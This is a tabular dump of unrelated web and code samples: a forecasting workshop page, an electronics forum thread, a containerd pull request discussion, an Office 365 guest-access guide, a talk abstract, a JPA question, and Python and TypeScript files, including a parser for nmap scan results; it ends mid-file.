Document
stringlengths 395
24.5k
| Source
stringclasses 6
values |
|---|---|
March 17, 2021 - March 19, 2021
Raf Frongillo, University of Colorado
David Pennock, DIMACS
Bo Waggoner, University of Colorado
Following the successful EC 2017 Workshop on Forecasting, we will hold the DIMACS Workshop on Forecasting in 2021. We welcome submissions describing recent research on crowd-sourced, data-driven, or hybrid approaches to forecasting. We especially encourage contributions that leverage forecasts to improve decisions. Please see the Call for Participation below for details.
Recent advances in crowdsourced forecasting mechanisms, including Good Judgment’s superforecasting, prediction markets, wagering mechanisms, and peer-prediction systems, have risen in parallel to advances in machine learning and other data-driven forecasting approaches. Innovations have come from academic researchers, companies, data journalists, and government programs like IARPA’s Aggregative Contingent Estimation program and Hybrid Forecasting Competition.
The workshop will emphasize forecasts embedded inside decision-making systems, where the value of a forecast comes from increasing the expected utility of a key decision. Our ultimate goal is to modernize organizations, markets, and governments by improving how they collect and combine information and make decisions.
The workshop embraces the diversity of this exciting and expanding field and encourages submissions from a rich set of empirical, experimental, and theoretical perspectives. We invite theoretical computer scientists studying algorithmic game theory, incentivized exploration, and NP-hard counting problems; AI researchers studying machine learning, human computation, Bayesian inference, peer prediction, and satisfiability; statisticians studying scoring rules and belief aggregation; economists studying prediction markets, financial markets, and wagering mechanisms; data journalists and marketing scientists studying surveys and polls; blockchain pioneers implementing decentralized prediction markets and other experimental market constructs; social and behavioral scientists studying human behavior modeling; human-computer interaction researchers designing interfaces to facilitate elicitation or convey uncertainty; and practitioners working to improve forecasts as a business or service.
Uncertainty is hard to communicate. Forecasters argue that they are “right”, and critics that forecasters are “wrong” (for example about Brexit or the US Presidential election), despite the fact that probabilistic forecasts can only be evaluated in bulk relative to other forecasts. We invite contributions discussing ways to communicate uncertainty and educate the public about modeling, forecasting, and scoring, building on the excellent 2018 Nova episode “Prediction by the Numbers”.
Topics of interest for the workshop include but are not limited to:
Wednesday, March 17, 2021
Welcome & Opening Remarks
Invited Talk: How to Increase the Accuracy of Human Forecasts and Check the Reasons for Improvement
Barbara Mellers, University of Pennsylvania
Ville Satopää, INSEAD
Asymptotic Behaviour of Prediction Markets
Philip Dawid, University of Cambridge
Timely Information from Prediction Markets
Chenkai Yu, Tsinghua University
Invited Talk: A Heuristic for Combining Correlated Experts
Yael Grushka-Cockayne, University of Virginia
Thursday, March 18, 2021
Invited Talk: Predicting Replication Outcomes
Anna Dreber, Stockholm School of Economics
From Proper Scoring Rules to Max-Min Optimal Forecast Aggregation
Eric Neyman, Columbia University
Forecast Aggregation via Peer Prediction
Juntao Wang, Harvard University
Comparing Forecasting Skill vs Domain Expertise for Policy-Relevant Crowd-Forecasting
Emile Servan-Schreiber, Mohammed VI Polytechnic University
Forecasting Startup Founders Panel
Pavel Atanasov, pytho
Andreas Katsouris, PredictIt
Kelly Littlepage, OneChronos
Emile Servan-Schreiber, Hypermind
Friday, March 19, 2021
Invited Talk: Information, Incentives, and Goals in Election Forecasts
Andrew Gelman, Columbia University
Models, Markets, and the Forecasting of Elections
Rajiv Sethi, Columbia University
Boosting the Wisdom of Crowds Within a Single Judgment Problem: Weighted Averaging Based on Peer Predictions
Ville Satopää, INSEAD
Crowdsourced Forecast Elicitation: Methods vs. Individuals
Pavel Atanasov, pytho
Invited Talk: Models vs. Markets: Forecasting the 2020 U.S. election
Harry Crane, Rutgers University
Attend: This workshop is open to all to attend, but you must register using the link at the bottom of the page. We will send instructions on how to join the event on or before March 15, 2021. If you do not receive them, please check your spam folder or contact Nicole Clark. Please note that you may not be able to register once the event has begun.
Present: We invite both full contributions and poster contributions. A full contribution is an unpublished or recently published research manuscript. A poster contribution can be a preprint, a recently published paper, an abstract, or a presentation file. Preference may be given to more recent and unpublished work. We especially encourage poster contributions from students and postdocs.
Please submit your contributions using this Google Form by February 19, 2021. The workshop is non-archival, meaning contributors are free to publish their results later in archival journals or conferences. Panel discussion proposals and invited speaker suggestions are also welcome. Email questions or suggestions to the organizers.
The workshop will include invited and contributed talks, open discussion, and may include a poster session and a rump session. Workshop registration will be open. Once registered, you will join the workshop through Virtual Chair.
Presented in association with the SF on Mechanisms & Algorithms to Augment Human Decision Making.
|
OPCFW_CODE
|
Ok I have a problem that just does not make sense but since I am a newbie I thought I would throw this up and see if I can get some pointers.
I had and I say HAD two 9V Duracell batteries (Alkaline not NiMh) that I hooked up to my bread board. In line I have either a SPDT or a DPDT switch (how do I tell, it has three leads but three positions one marked 1 the other marked 2 with the center position as the third). Wierd thing is that as long as the switch is in the 'ON' position and my circuit is receiving current, the 9V battery is just fine but once I turn the switch to the 'OFF' position it is only a matter of time before the 9V blows. I don't think it is a Duracell thing (I read some posts on the Net that said they were prone to spontaneous blowing up) because when I hooked up the second Duracell it also blew. Again if the switch is in the on position everything is hunky dory but as soon as it is switched off it is like the battery is shorting somehow and getting really hot and then boom (sounds kind of like a firecraker).
I checked voltage coming back to the battery and got back a very minute amount of voltage (I thought ok its somehow getting charge back to the battery and trying to recharge an alkaline). I am not sure if this is because of my voltmeter or if I can truly trust it.
One last idea, is it possible the switch is defective or is there a limit on the amount of voltage that can be passed through some of them. Could current somehow jump the open circuit.
I have since taken the switch out of the circuit to protect my new NimH batteries.
Grab your multitester…
Ok, what you have here is a simple short. Use your multi tester (measure-thingie) in it’s continuity mode, and find 2 contacts that switch on and off when you flip the switch. These are the contacts you will use, lets call them “A” and “B”. Now connect the negitive lead from your 9v directly to your test board. Next connect the positive lead from the battery snap to contact “A”. Finally, connect contact “B” to your test board. That’s it. One more, if you are using a robot brain on that breadboard of yours, remember -a lot of brains and sensors and the like work on 5V! Be sure you are not trying to shove too much power around.
By the way…
DO NOT SHORT OUT ANY KIND OF RECHARGABLE BATTERY!!! YOU MUST SOLVE THIS PROBLEM BEFORE YOU USE THE RECHARGEABLES.
If you think your alkilines are getting hot, a NimH or a Nicad will get about 10 times that hot or worse, will dump out enough current to turn all your wires into toaster elements… They will get very hot, melt the insulation, continue to short even worse and burn your house to the ground. Seriously.
Oh yes I am being very careful with them. For now I have removed the switch until I get it figured out. I have a resistor in line to protect my components and bring the Voltage down. My actual circuit uses a LED to show power is flowing and it then routed through a PIR sensor. From there I am trying to use an OP-Amp chip I bought to amplify the signal to a point that a micro controller will recognize it.
Anyway, thank you very much for the info on how to verify the pins of the switch. It has to be something like that thats happening.
There is no reasonable chance that their may be a defect in my breadboard is there?
Got it figured out I believe
Ok I was wrong on the three positions (sorry about that). It definitely has two positions with three terminals. I have since seen the error of my ways but I am man enough to post it here to the ridicule of all just so maybe it will help another electronics newbie. Please correct me if I am wrong here.
I initially had the switch wired like this: 1. I had the positive hooked to the same terminal on the switch, lets call it the left terminal. To correct this I really needed the positive from the battery hooked to the left terminal and have the positive going to my first component hooked to the center terminal to allow the positive to be connected only when the switch was in the left position. This issue led me to my second mistake. 2. I had the negative hooked up to the switch as mentioned in two of the replies. This appeared to work because as I had it hooked up if I moved the switch to the right (positive were both hooked to the center terminal the light would come on my led and if I moved it to the left it would go off. Unfortunately when it was off the switch was just looping the current back to the battery. When it was on it was ok because the current was eaten up by the components and the resistor.
Now the question for those more astute in electronics. Would the circuit have been fine if I had hooked the negative to the left terminal on both the component and the battery side and staggered the the positive by hooking the positive from the battery to the left most terminal and the component positive to the center terminal. in the position to the right there would not be a completed circuit, but to the left it would complete the circuit. Because the net back to the battery is always 0 wouldn’t this work correctly as well. (I am not saying it is correct but would it work, remember this is just for educational purposes only don’t just say don’t do it.)
Thanks all the terminal was correct but I also needed to stagger the positive or negative in order to make the switch work correctly which brings up one more question for you all, is it more correct to connect your switch to the negative side or the positive side?
You are thinking too much…
Just switch ONE WIRE on and off, period. Unless you are trying to reverse polarity, you will never have both positive and negitive going to a switch. Just switch ONE WIRE --I really does not matter which one is switched on and off, as long as the other wire goes straight to the load. ONE WIRE SWITCHED.
The switch should go in
The switch should go in series with the battery. so,
- one wire from the battery to the middle connector on the switch (doesn’t matter if it is the positive or the negative)
- one wire from the left or right connector (doesn’t matter which one) of the switch to the robot
- the other wire from the battery (the one that’s not connected to the switch) to the bobot
And, that’s it.
|
OPCFW_CODE
|
[1.3 - DO NOT MERGE] User namespace support
This is the containerd/cri implementation for the Kubernetes Node-Level User Namespaces Design Proposal. The patches are based on the release/1.3 branch. It is tested on Kubernetes 1.17 with patches adapted from PR 64005 (https://github.com/kinvolk/kubernetes/pull/4).
The purpose of this PR is to gather some early feedback from the community on this feature to start the discussion again. This PR is based on the release/1.3 branch, we don't intend to merge it as it is so it should not be a problem. We are planning to create / update a KEP to have a proper discussion about the design of this feature.
The main changes are:
Extend the configuration with uid/guid mappings.
Import the new CRI API from Kubernetes PR 64005.
Implement GetRuntimeConfigInfo returning the configured mappings.
Use the WithRemappedSnapshot snapshotter.
Fix sysfs mount with correct ownership of netns (see commitmsg for details).
Additional mount restrictions on /dev/shm (nosuid, noexec, nodev).
Chown /dev/shm appropriately.
Fix etc-hosts mounts with supplementary groups (see commitmsg for details).
Use custom options WithoutNamespace, WithUserNamespace, WithLinuxNamespace at the right places.
At the OCI level (config.json), we have the following changes:
sandbox container with new "user" namespace and UidMappings
normal containers with "user" namespace from a path and UidMappings
Demo:
Minimal example of the containerd configuration file:
version = 2
[plugins]
[plugins."io.containerd.grpc.v1.cri"]
[plugins."io.containerd.grpc.v1.cri".node_wide_uid_mapping]
container_id = 0
host_id = 100000
size = 65536
[plugins."io.containerd.grpc.v1.cri".node_wide_gid_mapping]
container_id = 0
host_id = 100000
size = 65536
$ kubectl apply -f userns-tests/node-standard.yaml
pod/pod-simple created
$ kubectl apply -f userns-tests/pod-standard.yaml
pod/pod-userns created
$ kubectl exec -ti node-standard -- /bin/sh -c 'cat /proc/self/uid_map'
0 0<PHONE_NUMBER>
$ kubectl exec -ti pod-standard -- /bin/sh -c 'cat /proc/self/uid_map'
0 100000 65535
userns-tests/pod-standard.yaml
# Pod user with userns set to "node" mode.
apiVersion: v1
kind: Pod
metadata:
name: node-standard
namespace: default
annotations:
alpha.kinvolk.io/userns: "node"
spec:
restartPolicy: Never
containers:
- name: container1
image: busybox
command: ["sh"]
args: ["-c", "sleep infinity"]
userns-tests/pod-standard.yaml:
# Pod user with userns set to "pod" mode. Pod creation would fail if userns
# not supported by runtime.
apiVersion: v1
kind: Pod
metadata:
name: pod-standard
namespace: default
annotations:
alpha.kinvolk.io/userns: "pod"
spec:
restartPolicy: Never
containers:
- name: container1
image: busybox
command: ["sh"]
args: ["-c", "sleep infinity"]
/cc @alban @rata
We don't intend to merge it as it is (that's the reason we used release/1.3 as the base)
? we would not merge a PR that is in [wip] or hold against the contributor's wishes...
? we would not merge a PR that is in [wip]/hold against the contributor's wishes...
I don't mean that we based it on release/1.3 to avoid merging. What I wanted to say is that it's not a problem to be based on release/1.3 because we don't want to merge it...
It is same as https://github.com/rootless-containers/usernetes?
And maybe https://github.com/kubernetes/enhancements/pull/1371 should replace Kubernetes Node-Level User Namespaces Design Proposal
@zhsj It is not the same: while both use user namespaces as underlying technology, they achieve different things:
usernetes uses unprivileged user namespaces to be able to run container runtimes without being root on the host. All containers run as the same user.
this user namespace support PR allows containers to run in a user namespace (and possibly soon with different id mappings), hardening the isolation between containers. This does not allow by itself to run kubelet/containerd/runc as non-root.
Both are useful, depending on the use cases.
What's current status?
What's current status?
We're waiting reviews on the Kubernetes KEP in order to define the CRI changes.
Can we implement "io.kubernetes.cri-o.userns-mode" convention until the KEP settles, or do we want to wait until KEP settles?
Will this allow a user to start an unprivileged kubernetes pod, and then use e.g. Singularity inside their pod to create a nested container?
Can we implement the "io.kubernetes.cri-o.userns-mode" convention until the KEP settles, or do we want to wait until KEP settles?
I'd like to get the KEP merged first and then implement this support in containerd. I fear that we would have a lot of heterogeneous implementations if we start implementing this support in the different runtimes without having a proper specification to do it. I also agree that people needing to have this support quickly could implement such mechanism to avoid waiting on Kubernetes on the meanwhile.
Will this allow a user to start an unprivileged kubernetes pod, and then use e.g. Singularity inside their pod to create a nested container?
Yes, that should work. User namespaces used in this context allow to run pods that require elevated privileges in a safer way. If you give the pod the correct capabilities to create containers and you satisfy other K8s security requirements like https://kubernetes.io/docs/concepts/policy/pod-security-policy/#allowedprocmounttypes that should be fine. However it's something we haven't tried and there could be unknown issues.
|
GITHUB_ARCHIVE
|
As a consultant, I am often invited to collaborate in other Office 365 tenants. This is often presented in the form of guest access into that tenant, which allows me to access applications such as Microsoft Teams or share files with SharePoint Online.
The benefit of guest access is that I can collaborate as if I were a member of that organization without consuming a license, or, requiring an identity in that tenant. For example, my guest access into that tenant could easily be attached to a personal email account hosted at outlook.com.
I often see guest access granted in mergers and acquisitions where the two companies need to collaborate at a business level well before any technology to integrate the two companies has been implemented.
But other scenarios that drive guest access include a company needing to collaborate with its vendors or partners, or, a consultant working with a customer on a project.
But what happens when that guest access is no longer needed?
For our example, Amy Pond successfully completed a project at Super Awesome LLC. Amy collaborated with Super Awesome employees using Microsoft Teams and would like to remove Super Awesome from her Microsoft Teams client. Amy needs to maintain access to Totally Brilliant LLC, which is her new project, and SuperTekBoy LLC, which is her employer. The screenshot below is how Amy’s Microsoft Teams client looks today.
In this article, Amy will leave Super Awesome’s Office 365 tenant by revoking her own guest access. After she revokes her access she will no longer have any access to any Super Awesome apps or data.
Let’s get started!
Revoking your guest (and Teams) access
Log into your primary Office 365 tenant by typing the following into your web browser – https://myapps.microsoft.com/.
Note: This URL will actually redirect you to https://account.activedirectory.windowsazure.com/. However, we find that myapps.microsoft.com is a much easier URL to remember.
From the Apps page click your name in the top right of the screen. This will bring up a menu. From the menu select Profile.
In the screenshot below, Amy Pond is currently logged in as SuperTekBoy LLC, which is her employer’s Office 365 tenant.
From the Profile page, you will see all organizations you are currently connected to, including your primary Office 365 tenant. To leave an organization, where you have been granted guest access, you must first sign into that organization.
Click the Sign in to leave organization link of the organization you wish to leave.
In our example below, Amy wishes to leave Super Awesome’s Office 365 tenant, so she clicks the sign-in link next to that organization.
Once logged in, you will be redirected to the Apps page for that tenant.
Click your name at the top right of the screen and select Profile from the menu.
From the Profile page click the Leave Organization link for the organization you wish to leave.
You will then be prompted to confirm your action. Click Leave to revoke your guest access, or, Cancel to cancel the request to leave.
Warning: Once you click leave you will lose all access to that Office 365 tenant. While this article was written with the focus of Teams, this will revoke your guest access to the entire tenant and any other apps or data you were accessing in that tenant. You can only regain access if you are sent a new guest invitation.
You will receive a confirmation that you have successfully left the Office 365 tenant where you previously had guest access. Click Ok.
This will return you to the Profile page. The tenant you just left should now be absent from the organization list.
Note: Typically the tenant you left will be removed from your list of organizations within a couple of minutes. However, we have seen instances where the tenant may take a couple of hours to disappear from the list.
Once the tenant has been removed from your profile page, that tenant will remove itself from your Microsoft Teams client.
In the screenshot below we can see Amy no longer has access to Super Awesome LLC in her Teams client.
Have you experienced any problems when leaving a tenant you have guest access to? Drop a comment below or join the conversation on Twitter @SuperTekBoy.
|
OPCFW_CODE
|
Germany's next topic model
The aim of this talk is to present a novel way of detecting topics that is especially suited for user generated content where topics are not as clearly separated as in the typical examples of Wikipedia or newsgroup articles. The basic idea is to compute a contextual similarity score that defines a network from which we can identify clusters through community detection.
Tags: Artificial Intelligence, Deep Learning & Artificial Intelligence, Data Science, Networks, NLP, Machine Learning, Visualisation
Scheduled on wednesday 12:20 in room cubus
Thomas Mayer is an NLP Data Scientist at HolidayCheck, located in Munich.
Identifying topic models for user generated content like hotel reviews turns out to be difficult with the standard approach of LDA (Latent Dirichlet Allocation; Blei et al., 2003). Hotel review texts usually don't differ as much in the topics that are covered as is typical with other genres such as Wikipedia or newsgroup articles where there is commonly only a very small set of topics present in each document.
To this end, we developed our own approach to topic modeling that is especially tailored to non-edited texts like hotel reviews. The approach can be divided into three major steps. First, using the concept of second-order cooccurrences we define a contextual similarity score that enables us to identify words that are similar with respect to certain topics. This score allows us to build up a topic network where nodes are words and edges the contextual similarity between the words. With the help of algorithms from graph theory, like the Infomap algorithm (Rosvall and Bergstrom, 2008), we are able to detect clusters of highly connected words that can be identified as topics in our review texts. In a further step, we use these clusters and the respective words to get a topic similarity score for each word in the network. In other words, we transform a hard clustering of words into topics into a probability score of how likely a certain word belongs to a given topic/cluster.
The presentation is structured as follows:
- short overview of existing topic modeling approaches
- shortcomings of these approaches with respect to our domain (hotel review texts)
- explaining the contextual similarity score and its relationship to word embeddings
- topic modeling step through community detection
- turning the hard clustering into a fuzzy topic model
References: David M. Blei, Andrew Y. Ng, Michael I. Jordan: Latent dirichlet allocation. In: Journal of Machine Learning Research, Jg. 3 (2003), S. 993–1022, ISSN 1532-4435 M. Rosvall and C. T. Bergstrom, Maps of information flow reveal community structure in complex networks, PNAS 105, 1118 (2008) http://dx.doi.org/10.1073/pnas.0706851105, http://arxiv.org/abs/0707.0609
|
OPCFW_CODE
|
import warnings
from warnings import warn
def var_features_to_genes(adata, gtf_file, extension=5000):
"""
Once you called the most variable features.
You can identify genes neighboring these features of interest.
"""
# extract_top_markers
#print(adata.uns['rank_genes_groups'].keys())
windows = [list(w) for w in adata.uns['rank_genes_groups']['names'].tolist()]
windows_all = []
for w in windows:
windows_all += w
# load the gtf file
with open(gtf_file) as f:
gtf_raw = f.readlines()
gtf = []
for line in gtf_raw:
if line[0] != '#':
gtf.append(line[:-2].split('\t'))
del gtf_raw
gtf_dic = {}
for line in gtf:
if line[0] not in gtf_dic.keys():
gtf_dic[line[0]] = [line]
else:
gtf_dic[line[0]].append(line)
del gtf
markers = []
for w in windows_all:
curr_m = []
w2 = w.split('_')
chrom = w2[0][3:]
w2 = [int(x) for x in w2[1:]]
for gene in gtf_dic[chrom]:
start = int(gene[3])-extension
end = int(gene[4])+extension
if (w2[0] < start < w2[1]) or (w2[0] < end < w2[1]):
gene_name = gene[-1]
for n in gene[-1].split(';'):
if 'gene_name' in n:
gene_name = n
curr_m.append([w, gene_name])
if curr_m != []:
markers += curr_m
markers = [list(x) for x in set(tuple(x) for x in markers)]
markers_dict={}
for n in markers:
markers_dict[n[1].split(' "')[1][:-1]] = n[0]
return(markers_dict)
def top_feature_genes(adata, gtf_file, extension=5000):
"""
Deprecated - Please use epi.tl.var_features_to_genes instead.
Once you called the most variable features.
You can identify genes neighboring these features of interest.
"""
warn.warn('Deprecated - Please use epi.tl.var_features_to_genes instead.')
var_features_to_genes(adata=adata, gtf_file=gtf_file, extension=extension)
|
STACK_EDU
|
from .nmap_data import NmapData
class HostData(NmapData):
DEFAULT_HOST_DATA_COLUMNS = ['IP', 'HOSTNAME', 'OS', 'DEVICE TYPE']
def __init__(self, ip, hostname = None):
if ip == None or ip.strip() == '':
raise Exception('Must provide an IP address when creating a HostData object')
self.ip = ip
self.hostname = hostname
self.os_list = []
self.device_types = []
# Mapping of nmap service info key to list of values
self.additional_service_info = {}
# Mapping of port number strings to lists of PortData objects
self.data_by_port_number = {}
def __str__(self):
lines = []
lines.append('Host IP: %s' % self.ip)
if self.hostname != None:
lines.append('Hostname: %s' % self.hostname)
if len(self.os_list) != 0:
lines.append('OS(s): %s' % ', '.join(self.os_list))
if len(self.device_types) != 0:
lines.append('Device Type(s): %s' % ', '.join(self.device_types))
for key in self.additional_service_info:
if type(self.additional_service_info[key]) == list:
value_str = ','.join(self.additional_service_info[key])
else:
value_str = self.additional_service_info[key]
lines.append('%s: %s' % (key, value_str))
# This line is just for formatting
lines.append('')
for port_number in self.data_by_port_number:
for port_data in self.data_by_port_number[port_number]:
lines.append(str(port_data))
# These lines are just for formatting
lines.append(self.DIVIDER)
lines.append('')
return '\n'.join(lines)
def as_dict(self):
d = {}
d['ip'] = self.ip
d['hostname'] = self.hostname
d['os_list'] = self.os_list
d['device_types'] = self.device_types
for key in self.additional_service_info:
d[key] = self.additional_service_info[key]
serialized_port_data = {}
for port_number in self.data_by_port_number:
serialized_port_data[self.value_as_str(port_number)] = [
port_data.as_dict()
for port_data in self.data_by_port_number[port_number]
]
d['port_data'] = serialized_port_data
return d
# Will return a list of dictionaries, with each dictionary containing
# all of the data for a single row / record in the ultimate output report
def to_list_of_records(self):
records = []
base_dict = {}
base_dict['IP'] = self.value_as_str(self.ip)
base_dict['HOSTNAME'] = self.value_as_str(self.hostname)
base_dict['OS'] = '; '.join(self.os_list)
base_dict['DEVICE TYPE'] = '; '.join(self.device_types)
for key in self.additional_service_info:
value_str = None
if type(self.additional_service_info[key]) == list:
value_str = ','.join(self.additional_service_info[key])
else:
value_str = self.additional_service_info[key]
base_dict[key.upper()] = value_str
# 'IP', 'HOSTNAME', 'OS', 'DEVICE TYPE', 'PORT NUMBER', 'PROTOCOL', 'STATE', 'SERVICE', 'VERSION'
for port_number in self.data_by_port_number:
for port_data in self.data_by_port_number[port_number]:
# Create a copy of the base_dict to prevent editing that dictionary directly
data_dict = base_dict.copy()
data_dict['PORT NUMBER'] = self.value_as_str(port_data.port_number)
data_dict['PROTOCOL'] = self.value_as_str(port_data.protocol)
data_dict['STATE'] = self.value_as_str(port_data.state)
data_dict['SERVICE'] = self.value_as_str(port_data.service)
# Escape any comma's in the service version
data_dict['VERSION'] = self.value_as_str(port_data.version.replace(',', ''))
records.append(data_dict)
return records
def clone(self):
new_host_data = HostData(self.ip, self.hostname)
new_host_data.os_list = self.os_list
new_host_data.device_types = self.device_types
new_host_data.additional_service_info = self.additional_service_info
new_host_data.data_by_port_number = {}
for port_number in self.data_by_port_number:
new_host_data.data_by_port_number[port_number] = [
port_data.clone()
for port_data in self.data_by_port_number[port_number]
]
return new_host_data
def add_data(self, port_data):
if port_data.port_number in self.data_by_port_number:
port_data_entry_exists = False
for existing_port_data in self.data_by_port_number[port_data.port_number]:
if existing_port_data == port_data:
port_data_entry_exists = True
if not port_data_entry_exists:
self.data_by_port_number[port_data.port_number].append(port_data)
else:
self.data_by_port_number[port_data.port_number] = [port_data]
def add_os_data(self, os_data):
if os_data is None:
print("WARNING: OS data is empty")
if type(os_data) is list:
self.os_list += os_data
elif type(os_data) is str:
self.os_list.append(os_data)
else:
raise Exception("Unknown / unsupported data type encountered")
def add_device_data(self, device_data):
if type(device_data) is list:
self.device_types += device_data
elif type(device_data) is str:
self.device_types.append(device_data)
else:
raise Exception("Unknown / unsupported data type encountered")
def add_service_info_data(self, key, value):
if key in ('OS', 'OSs'):
self.add_os_data(value)
elif key in ('Device', 'Devices'):
self.add_device_data(value)
if key in self.additional_service_info:
if not value in self.additional_service_info[key]:
self.additional_service_info[key].append(value)
def filter_by_port(self, port_numbers, state = None):
filtered_host_data = self.clone()
match_found = False
new_data_by_port_number = {}
for port_number in self.data_by_port_number:
if port_number not in port_numbers:
continue
for port_data in self.data_by_port_number[port_number]:
if state is not None and port_data.state != state:
# Ignore port state unless one is provided to filter on
continue
match_found = True
if port_number in new_data_by_port_number:
new_data_by_port_number[port_number].append(port_data.clone())
else:
new_data_by_port_number[port_number] = [port_data.clone()]
filtered_host_data.data_by_port_number = new_data_by_port_number
if match_found:
return filtered_host_data
else:
return None
def os_is_any_of(self, os_list):
match_found = False
for os in self.os_list:
if self.any_substring_matches(os, os_list):
match_found = True
break
return match_found
def device_type_is_any_of(self, device_prefix_list):
match_found = False
for device_type in self.device_types:
if any_prefix_matches(device_type, device_prefix_list):
match_found = True
break
return match_found
|
STACK_EDU
|
How to properly refresh a stale entity from a database?
In my web application I often need to keep entities read from the database over the span of a single request and refresh them later in another request. Currently I have a helper method
protected <T> T refresh(T t) {
if (!entityManager.contains(t)) {
t = merge(t);
entityManager.refresh(t);
}
return t;
}
Each method them refreshes the entity it's working on before anything else. If the entity has already been refreshed, nothing happens.
This worked nicely, until later I realized that this solution has a significant problem: The call to merge fails if the entity has been concurrently modified in the database. Obviously merge can't "know" that the content of t will be replaced anyway by the immediate call to refresh.
What would be the proper solution to this problem? So far I have these ideas, none of which feels completely satisfactory:
Instead of calling merge and refresh, get the ID of the entity and call
t = find(theClassOfT, t.getId());
This would solve the problem, I'd get a fully fresh entity, but it has a major drawback: I need to know the class of T and it's ID. Getting the ID can be accomplished by a having a top super-interface for all my entities, but getting the class is problematic (since a JPA implementation may subclass the entities, I'm afraid that calling t.getClass() could return some implementation specific subclass of T).
Keep only IDs in the long term and read entities fresh during each request. This seem more correct from the design point of view (stale entities carry invalid information anyway), but again requires to have the class of T at hand.
Update: The reason I'm keeping the entities across the requests is merely for convenience. I specifically don't need to ensure that the entity isn't modified during that time - I refresh it at the next request anyway.
Your #1 should work.
object.getClass() should work for the class, for the Id you can use emf.getPersistenceUnitUtil().getIdentifier(object).
Also not you can pass a properties Map to the find() operation, and can include the refresh query hint ("eclipselink.refresh"="true" or "javax.persistence.cache.storeMode", "REFRESH"), this can avoid potential 2 queries.
If you are trying to refresh an entity from the database you're probably doing something wrong.
Your entities should not live any longer than required. Your JPA provider should handle caching, so recalling the same query and retrieving the same entity again shouldn't be much of a fuss. So, store your entity in @RequestScoped, @ConversationScoped and similar scopes.
On the other hand, if you do need the entity for a longer period of time, you should look into locking. As the previous poster explained, you can either do:
pessimistic locking, where you LOCK entity and prevent anybody else from updating it before you commit
optimistic locking, where you expect the entity not to be updated, but save() may fail somebody has
Read more about locking and JPA for example here: http://city81.blogspot.com/2011/03/pessimistic-and-optimistic-locking-in.html
I think you are describing optimistic locking.
One approach is to lock the entity until a client will commit the changes - this will lower tour app's throughput.
Or use optimistic locking - you can hope that the object will not change, place the identifier of version in the entity. Once the objects is being saved, the number is checked against current state in DB and if it does not match, because another client changed the entity, this concurrent update just fail. Your application must be able to solve the state once concurrent modifications happens.
|
STACK_EXCHANGE
|
jambitee Elena has been working as a software engineer at jambit since January 2020. She is a newcomer in software development and to have a smooth lateral entry, she participated in the jambit academy's beginner course "Software Development in Practice" last year. The course takes place once a year and is aimed at lateral entries from technical and scientific disciplines, among others. We asked Elena what her lateral entry into software development looked like.
Hey, Elena, how did you get into software development?
Programming has fascinated me since my younger days. But after finishing high school in my home country Russia, I decided to study business administration – that was just cool in the early 2000s. After that, I worked in project management for several years and during this time I gained first experience in IT business – doing programming projects as a side job. Since my time in Germany, I have increasingly gone to Meetups. With two goals: after the birth of my son four years ago, I wanted to gain more professional input and improve my German at the same time. Two years ago, I went from Moscow to Munich. I got to know jambit through the meetup Lego for Scrum. That's how I first got to know the company as a place where programming enthusiasts come together. At the meetup, I was caught by the special "spirit", I wanted to learn more and stayed tuned.
To whom would you recommend the beginner course "Software Development in Practice" and how to prepare for it?
Software development should not only be done because it is trendy. Programming must be a passion. I recommend to everyone: try online courses and platforms and gain experience. I think the platforms hyperskill.org or hackerrank are great. The beginner course was a great offer to apply my know-how not only at my desk at home, but in a real software company. During the course, you get a good feeling for what you can expect in your daily work, because you program a mobile app for Android with Kotlin or iOS with Swift.
The course also provided a great opportunity to test my knowledge in comparison to other course participants, i.e. to reveal my weaknesses and strengths. The course also gave me the confidence and motivation to fill my knowledge gaps. A concrete tip in advance: if you are unsure whether your programming skills are sufficient for the course, jambit provides an online programming skills test.
How and why did you decide to work as a software engineer at jambit?
I came to jambit via a classic application, by the way, only several months after the beginner course. My first step was not to apply for a job, but to set up a learning plan that would gradually prepare me for the technical interview. Through the jambit academy, I knew where I still had to catch up. I looked at various companies. jambit – again – convinced me with its total package. For example, the flexible working hours, which are very important for me as a mother. And something else: the jambit spirit, which I already experienced at the meetup. I felt right at home.
The lateral entry course "Software Development in Practice" in Munich
The beginner course Software Development in Practice consists of ten sessions and will take place from March 6 to April 4, 2020. Five weeks with two sessions each on Friday and Saturday from 10 a.m. to 5 p.m. Using the development of a mobile app as an example, the following contents are taught in this beginner's program for professional software development:
- Common tools of software development
- Agile working and Scrum
- Typical development processes in software projects
- Basics of "good" software development
- Teamwork, documentation and knowledge exchange
|
OPCFW_CODE
|
import { Messenger } from 'gotti-pubsub/dist';
enum MSG_CODES {
// FRONT MASTER -> BACK MASTER
SEND_QUEUED,
//BACK MASTER -> FRONT MASTER
PATCH_STATE,
MESSAGE_CLIENT,
// FRONT -> BACK
CONNECT,
DISCONNECT,
SEND_BACK,
BROADCAST_ALL_BACK,
LINK,
UNLINK,
ADD_CLIENT_WRITE,
REMOVE_CLIENT_WRITE,
// BACK -> FRONT
ACCEPT_LINK,
CONNECTION_CHANGE,
BROADCAST_LINKED_FRONTS,
BROADCAST_ALL_FRONTS,
SEND_FRONT,
}
export type PublishProtocol = any;
export type PushProtocol = any;
export type SubscribeProtocol = any;
export type PullProtocol = any;
type SubscriptionHandler = (...any) => void;
/**
* helper class with functions to make sure protocol codes stay synchronized between front and back channels.
*/
export class Protocol {
constructor(){};
//FRONT MASTER -> BACK MASTER
static SEND_QUEUED(backMasterIndex) : string { return Protocol.make(MSG_CODES.SEND_QUEUED, backMasterIndex) };
static DISCONNECT() : string { return Protocol.make(MSG_CODES.DISCONNECT) }; //todo: figure out all disconnection edge cases before implementing
//BACK MASTER -> FRONT MASTERS
static PATCH_STATE(frontMasterIndex) : string { return Protocol.make(MSG_CODES.PATCH_STATE, frontMasterIndex) };
static MESSAGE_CLIENT(frontMasterIndex) : string { return Protocol.make(MSG_CODES.MESSAGE_CLIENT, frontMasterIndex ) };
// FRONT -> BACKS
static CONNECT() : string { return Protocol.make(MSG_CODES.CONNECT) };
static BROADCAST_ALL_BACK() : string { return Protocol.make(MSG_CODES.BROADCAST_ALL_BACK) };
static SEND_BACK(backChannelId) : string { return Protocol.make(MSG_CODES.SEND_BACK, backChannelId) };
static LINK(frontUid) : string { return Protocol.make(MSG_CODES.LINK, frontUid) };
static UNLINK(frontUid) : string { return Protocol.make(MSG_CODES.UNLINK, frontUid) };
static ADD_CLIENT_WRITE(frontUid) : string { return Protocol.make(MSG_CODES.ADD_CLIENT_WRITE, frontUid) };
static REMOVE_CLIENT_WRITE(frontUid) : string { return Protocol.make(MSG_CODES.REMOVE_CLIENT_WRITE, frontUid) };
// BACK -> FRONTS
